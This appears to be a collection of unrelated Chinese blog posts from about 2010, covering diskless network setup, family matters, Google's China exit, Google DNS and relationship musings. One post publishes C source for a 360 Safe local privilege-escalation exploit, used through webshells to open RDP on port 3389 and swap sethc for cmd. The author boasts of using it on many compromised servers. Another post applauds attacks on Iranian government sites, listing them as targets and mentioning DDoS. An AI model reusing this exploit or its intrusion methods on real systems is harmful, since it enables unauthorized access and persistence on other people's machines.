本来做个锐起的无盘网络很简单的,网上操作流程都是有的,但是从购置硬件到组建网络,再到硬件故障,有时候真的很让人无语。
网上流传的绿茶Win2003服务器版不能做无盘,我下载了一个绿茶的高级服务器版做无盘,下面的客户机识别到硬盘之后就不能格式化,我觉得应该是权限的问题,不过不想修改了。直接安装了原版windows2003
后面是阵列卡出问题,右下角不停提示windows延缓写入失败,事件查看器里提示设备 \Device\Harddisk1 的访问功能尚未就绪。 其实就是第二块硬盘掉了。我的服务器装了三块硬盘,一个80G做系统,两个500G,一个用,一个备份。 说第二块硬盘未就绪,有可能是数据线问题,然后是阵列卡和硬盘的问题,我换了数据线,然后扫描硬盘坏道(新买的希捷硬盘,无坏道),问题依旧,我找配电脑给我的商家换了一块阵列卡,然后就OK了!~
但是这几天因为我的服务器原因给同事们带来的不满着实让我冷汗啊!以后得夹着小尾巴呀,。
小心被
oooO ↘┏━┓ ↙ Oooo
( 踩)→┃你┃ ←(死 )
\ ( →┃√┃ ← ) /
\_)↗┗━┛ ↖(_/
今天接到老妈的电话,不住的说哪一套房子给我,我不在家里住也要把房子卖了给我钱。从来没想过会有这样的事情,稀里糊涂的,还记得家里那套房子,很大,很漂亮,也很喜欢,只是处在闹市区,喧哗的有点让人睡不好觉。
父母给什么,是他们的心意,当我已经长到23岁的时候,我期望能够凭着自己的努力得到点什么。而不是总把他们作为骄傲,我希望有一天他们能把我作为他们的骄傲。
最后,现在的经济都是钢筋水泥在撑着。房价也弄的暴高!如果真的存在爆破那一天,房价又会是怎样? 我是不是应该趁下一个通货膨胀的预期把房子卖掉?对统计局发布的经济数据感觉好失望!
不知道该说什么好了,以前拿了很多shell,一直懒得提权,一是没那个必要,二是提权太累了,三是服务器类型的肉鸡多了也没啥用。不过要是能让我一下子就成功提权,何乐而不为呢?
于是360本地提权来了,最近已经沸沸扬扬的了,不多发表过多评论,只是觉得做公司更要厚道;本人菜另外还有很多兄弟在360,不说什么了,发了本地提权的利用程序吧。friddy那里已经有一份了,是用来替换5下shift为cmd.exe的:360本地提权webshell下测试程序。
瑞星说是“bregdrv.sys和bregdll.dll”出的问题,然后http://www.sebug.net/exploit/19048/这个poc也是直接load这个dll的,于是这个利用程序也是基于这个的。webshell下使用,guest权限即可,需要Wscript.shell支持,功能主要是:
1.开启终端服务,端口为3389;用法:360.exe port
2.替换5下shift为cmd;用法:360.exe sethc
另外大家可以参考下包子的文章:360 0day漏洞及相关内幕,360很多dll存在类似的调用问题。据360的公告介绍已经打补丁了,具体是真是假,大家自己试试这个工具还能不能用吧。
这个工具不针对任何公司和个人,仅限爱好渗透的同学们进行交流。话说昨天从下午到晚上,我2、3年来拿到的仍然健在的shell的满足3389打开与安装了360安全卫士的服务器我都提了一下权,发现360在服务器的普及率也高的惊人,至少有80%,怪不得大家都提权提的爽死了,于是乎,很多肉鸡终于找到家了。
现在终于知道服务器类型的肉鸡的好处了,一是用来上线;二是用来摆放垃圾未备案域名;三是用来跑密码…看来之前轻视了。
演示:
(注:本图片只限学习,拒绝按此方法进行破坏或者瑞星公司拿此图片作为炒作)
#include <windows.h>
typedef BOOL (WINAPI *INIT_REG_ENGINE)();
typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);
typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);
typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);
typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);
BREG_DELETE_KEY BRegDeleteKey = NULL;
BREG_OPEN_KEY BRegOpenKey = NULL;
BREG_CLOSE_KEY BRegCloseKey = NULL;
REG_SET_VALUE_EX BRegSetValueEx = NULL;
#define AppPath "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe"
#define TestDeleteKey HKEY_LOCAL_MACHINE
#define TestDeleteRegPath "Software\\360Safe\\Update"
#define TestSetKey HKEY_LOCAL_MACHINE
#define TestSetPath "Software\\360Safe"
BOOL InitBRegDll()
{
LONG lResult;
HKEY hKey;
CHAR cPath[MAX_PATH + 32] = { 0 };
DWORD dwPathLen = MAX_PATH;
lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);
if (FAILED(lResult))
return FALSE;
DWORD dwType = REG_SZ;
lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);
RegCloseKey(hKey);
if (FAILED(lResult))
return FALSE;
strcat(cPath, "\\deepscan\\BREGDLL.dll");
HMODULE modBReg = LoadLibraryA(cPath);
if (!modBReg)
return FALSE;
INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");
BRegDeleteKey = (BREG_DELETE_KEY)GetProcAddress(modBReg, "BRegDeleteKey");
BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");
BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");
BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");
if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {
FreeLibrary(modBReg);
return FALSE;
}
if (!InitRegEngine()) {
FreeLibrary(modBReg);
return FALSE;
}
return TRUE;
}
LONG TestSetRegKey()
{
HKEY hKey;
LONG lResult;
lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);
if (FAILED(lResult))
return lResult;
DWORD dwType = REG_SZ;
static char szData[] = "TEST VALUE";
lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));
BRegCloseKey(hKey);
return lResult;
}
int main(int argc, char *argv[])
{
if (!InitBRegDll()) {
MessageBoxA(NULL, "初始化BReg失败!", "失败", MB_ICONSTOP);
return 1;
}
if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {
MessageBoxA(NULL, "键值删除失败!", "失败", MB_ICONSTOP);
return 2;
}
if (FAILED(TestSetRegKey())) {
MessageBoxA(NULL, "设置键值失败!", "失败", MB_ICONSTOP);
return 3;
}
MessageBoxA(NULL, "突破系统安全检查,获得最高权限,漏洞利用成功!", "成功", MB_OK);
return 0;
}
2010.02.05
程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
无论我怎么气愤的想要离开,我的身体碰到她的时候却还是会兴奋,那加速的血液总是让我丧失理智。
她急速的转身,移动身体,我看不清两腿的交替,只有屁股的扭动,然后消失在人群中。我无奈的转身,看着远处的车辆,继续往家走……
自从手机丢了,卡丢了,钱也丢了。从此信心也丢了!但是哥的希望没丢,哥坚强的挺过来了。兄弟们,等着哥东山再起吧!向哥看齐吧,偶也!!!
以下为证:哥辉煌的今天
消息传来,谷歌总部正在评估自己在中国商业运营的可行性,并可能完全退出中国市场。谷歌在中国的搜索引擎市场占有26%的市场份额。
多年以来,谷歌公司以其创新精神和“不作恶”的商业伦理,在世界范围内获得了广泛赞誉。虽然业绩不如百度,但各界公认的是,谷歌中国是比百度更有原则、更负责任的公司。这也是为什么这一年来发生了谷歌色情门以及谷歌图书馆侵权事件,业界及中国网民却仍对谷歌不失敬意的原因。
然而,谷歌公司所信奉的商业伦理必然会与中国目前的商业环境发生冲突。因此,选择退出还是留下,恐怕不仅仅是一个商业问题,而是其面临的道德困境。这个道德困境其实同样困扰着很多跨国公司。退出固然能够使谷歌保持道德上的某些原则,但无疑也会伤害无数中国用户的感情。而如果留下,或许只有两种选择:一是如很多跨国公司一样进行公司伦理的本土化,与现实的商业环境“同流合污”;二是被动地合作,为坚持原则而比竞争对手付出更多的代价。这其实需要一种自我牺牲的精神。应该说,无论做出怎样的选择,对谷歌公司来说都是痛苦的。
谷歌公司怀有整合全人类信息的宏大梦想,要实现这个梦想,是不可能离开中国的。即便现在退出了中国,早晚也会在条件改善之后再回来。事实上,一个更良好的商业环境不会因为一个公司的退出而到来,更不会凭空从天上掉下来,其需要的正是在秉持“不抛弃、不放弃”的原则下日积月累的种种工作。如果真的把自己视为一个负责任的公司,谷歌为什么不选择和它的中国用户一起坚守下来呢?在一个劣币驱逐良币的市场环境中,良币其实不应首先自我放弃。
美国当地时间1月12日15时,谷歌高级副总裁和首席法律顾问大卫·多姆德(David Drummond)在谷歌官方博客上发文表示,谷歌集团考虑关闭“谷歌中国”网站以及中国办事处。
该博客宣称,我们已经决定,不愿意继续审查“谷歌中国”搜索到的结果。如果有可能的话,接下来的几周里,我们将和中国政府商议,在法律允许范围内运行一个不必经过过滤的搜索引擎。如果不能达成协议,可能意味着我们将不得不关闭“谷歌中国”,甚至是谷歌中国办事处。
———从Google的股价有多高就知道市场认为这公司有多重要,它确实代表了未来的方向。而且鉴于它和各行业切不断的联系,它一旦完全退出中国,可能引起连锁反应,尤其是互联网产业,这对任何人都没有好处,所以此时我只能希望这盘棋对局的多方不要把棋下死了。
———为什么在世界任何角落都钱途光明、简直就是互联网代名词的Google居然会觉得无利可图?背靠数亿使用中文的网民,现在赚不了大钱没关系,但对未来赚钱的前景如此悲观,实在是耐人寻味。
———我的Gmail邮箱怎么办?我跟Google的一切都应该怎么办?没有了Google,互联网跟局域网越来越像了。
———如果没有Google,我很好奇国内搞科研的人怎么搜索研究文献?
虽然我知道中国不会存在不必经过过滤的搜索引擎,但是我还是幼稚的希望这一切会只是一个谎言。就像小时候想骗父母的一块钱为自己买个棒棒糖。
Google,我是如此爱你,却只能沉默站在原地,像一个迷失孩子般,遗落在人群……留下吧。
1月12日早上,所谓的伊朗网军黑掉了中国著名商业网站 百度 www.baidu.com
一个小时候中国红客联盟,暗组技术论坛等很多知名黑客组织迅速组织力量奋起反击。ir 结尾的域名是伊朗国家域名,类似我们的 cn 就是中国的意思。
http://www.diabetes.ir/home/#top 最可怜的是这个糖尿病网站,被N多人改来改去。
外交部 www.mfa.gov.ir
司法部 www.judiciary.ir
科技研究部 www.msrt.gov.ir
国防部 www.mod.gov.ir
内务部 www.moir.gov.ir
卫生与医药部 www.mohme.gov.ir
教育部 www.medu.gov.ir
文化与伊斯兰指导部 www.ershad.gov.ir
商业部 www.moc.gov.ir
农业圣战部 www.maj.gov.ir
福利与社会安全部 www.refah.gov.ir
这个时间段,伊朗的政府网站基本都瘫痪了,QQ群里的人都在用DDOS攻击没有漏洞的网站。我建议拿下伊朗领袖的站,不过,似乎没人愿意去做!今天是最有意思的一天
对于事件发生之后,大众往往把更多的注意力聚集在原因上,却忽略了对其利益链条上环环相扣的诸多环节的影响。更何况百度拥有庞大的利益集团,其日均 IP 访问量约为18,240,000,日均 PV 浏览量大约145,920,000,这对于一般网站是个望尘莫及的数字。正所谓“牵一发动全身”,可想而知,其影响程度更是难以比拟的。
虽然百度的利益链条不容小觑,但正反始终是相融于一体的,有消息传出,这次百度被黑导致百度亏损远超过700万,百度股价受断网影响下挫3.51% ,为1个月最低点。一家欢喜一家愁,百度此次事件引申的经济学远不止这些。
其一,由于百度断网11个小时,与之竞争的谷歌、搜搜、搜狗、中国雅虎等其他搜索引擎访问量明显攀升,尤其给谷歌这个百度冤家带来的机会不小,“百度”一词成为12日谷歌上升最快的关键词。只不过,1月13日,又有消息称,谷歌在其官方博客上表示,考虑关闭中国运营及Google.cn网站,致使在当天谷歌的盘后交易中股价挫跌1.3%,可见,谷歌的实际经济利益增长也不显著。
其二,之前有媒体曝光黑客灰色利益链出炉,且年收入可破百亿。显然,黑客群体的增长速度是难以预测的,加上曾有专家推测2010年黑客的数量又将有新的发展。在这次的百度事件中,黑客当然是最醒目的名词,由于中国黑客攻击行为并没有受到舆论的谴责,而是欢呼雀跃,原因在于其发扬了爱国主义,为中国争回了颜面,着实又让黑客火了一回。
其三,“百度被黑”了,“伊朗网军”出名了,米农们瞄准时机,开始抢注域名了:百度被黑(baidubeihei.com)、伊朗网军(yilangwangjun.com)等等相关域名迅速被注册。不过,国内刚刚对CN域名注册做了限制,预计与之相关的.CN域名无人注册。
其四,这次复仇行动远不止中国黑客,其中包括一个较疯狂的行为,一些中国网友组团给[email protected](伊朗网军邮箱)发信:“A big FUCK YOU from China.”,为此以解心头之恨。但是这也需要考虑到对方的黑客身份,发信邮箱极有可能被黑,必然会注册马甲邮箱,故此邮箱注册增长并无可能。
出租房这里上网速度实在是个慢,半夜两点房东都还跟我抢带宽。卡的受不了,猛然想起谷歌推出免费DNS服务了,轻轻一试,差点没吓死。速度快的惊人!!!!!!!
使用方法:如图所示,只需要把DNS服务器改为::“8.8.8.8”和“8.8.4.4”即可
Google提供的公共DNS服务与电信或联通的不同,当用户输入一个错误的或者不存在的网址的时候,不会像中国电信一般直接弹出一个满屏都是广告的114页面,Google公司承诺绝不会重定或者过滤用户所访问的地址,而且绝无广告。这样也能很好的预防dns劫持/攻击了,速度又那么快,何乐而不为呢!哈哈
电信,铁通,联通/网通等dns服务器都不同,电信的114,联通/网通的域名纠错系统都是满屏的广告。DNS服务器维护还很不到位,不用它们了!!
她说:我在结婚前是不会**的?
当那天听到她的话得时候,我看得出她眼中的迷惑,我把眼光转了过来,看着不远处楼上的射灯……我没有回答她.很多时候我都在想,上床是一种交流还是一种伤害?是一种占有还是一种温暖?是一种放荡还是一种抒情?是一种堕落还是一种寂寞?是一种挑逗还是一种给予?有很多时候,我的脑子是模糊的。关于爱情,关于传统的美德和高尚。关于背叛和恶毒的辱骂。坦白的说,我心里还是很不舒服的.我不知道能不能做到,最主要的是,我或是我们有没有必要这样做?小心翼翼,我却没有
然后又在想,我们之间是不是有了代沟?或是她在顾虑什么呢?
我们有时候是不是把爱情划分得过于清楚了,怎样到了喜欢,什么程度到了爱,哪种阶段可以上床,甚至是只上床不做爱~!
呵~!再后来的这段时间里,越是想想,越是好笑~!非得那样子么?女孩?
只恨自己,当晚为什么不问问她,为什么要这样做/?
现在真的是一团糟了~~~!爱与恨,爱与性,要怎么去拿捏?
我在自己的日记里写下了这篇日记。女孩子都说如果换做是她们一定能做到,因为她们是女生,而我做不到,那是因为我是男生~~~~!这又有何区别啊?上帝?
这究竟是怎么了,如果换做是你
你能做到吗?
只上床不做。